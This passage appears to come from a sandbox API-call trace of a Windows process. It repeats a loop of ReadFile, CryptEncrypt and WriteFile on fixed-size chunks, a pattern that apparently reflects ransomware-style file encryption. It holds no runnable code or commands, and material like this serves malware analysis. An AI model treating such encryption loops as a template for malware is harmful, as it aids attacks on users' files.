lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.908] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.908] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.908] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.908] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.908] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.908] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.908] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.908] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.908] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.908] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.909] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.909] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.909] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.909] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.909] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.909] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.909] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.909] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.909] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.909] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.909] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.909] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.909] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.909] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.909] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.909] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.909] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.909] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.909] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.909] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.913] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.913] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.913] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.913] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.913] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.913] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.913] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.913] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.913] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.913] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.913] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.913] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.914] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.914] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.914] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.914] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.914] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.914] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.914] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.914] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.914] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.914] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.914] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.914] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.914] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.914] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.914] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.914] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.914] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.914] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.914] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.915] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.915] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.915] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.915] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.915] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.915] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.915] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.915] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.915] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.915] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.915] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.915] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.915] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.915] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.915] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.915] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.915] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.915] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.915] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.915] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.916] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.916] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.916] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.916] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.916] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.916] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.916] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.916] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.916] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.916] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.916] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.916] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.916] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.916] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.916] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.916] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.916] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.916] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.917] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.917] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.917] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.917] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.917] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 